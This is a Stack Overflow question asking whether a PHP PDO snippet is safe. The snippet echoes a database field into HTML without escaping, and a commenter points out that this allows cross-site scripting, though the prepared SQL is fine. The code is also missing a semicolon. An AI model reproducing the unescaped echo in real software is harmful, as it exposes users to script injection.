PHP and PDO Protecting script advice

Asked Aug 27 '15 at 00:25

Active Aug 27 '15 at 00:47

Viewed 25 times

$stat = $con->prepare("SELECT * FROM view WHERE user_name =:user ORDER BY id DESC");
            $stat->bindValue(':user', $user);
            $stat->execute();
            $row = $stat->fetch(PDO::FETCH_ASSOC)
            $model=$row['model'];

This is script works without any problem. Is $model safe or do I need to sanitize it?

Usage:

<span><?php echo $row['model'] ;?></span>

Is this safe?

edited Aug 27 '15 at 00:47

chris85

23,846
7
34
51

asked Aug 27 '15 at 00:25

Стилиян Георгиев

3

No, you are open to XSS injections with this code. http://stackoverflow.com/questions/1996122/how-to-prevent-xss-with-html-php Note: this is not a PDO vulnerability, your PDO/SQL is good. – chris85 Aug 27 '15 at 00:28
good question for sure – Drew Aug 27 '15 at 00:38

PHP and PDO Protecting script advice

0 Answers0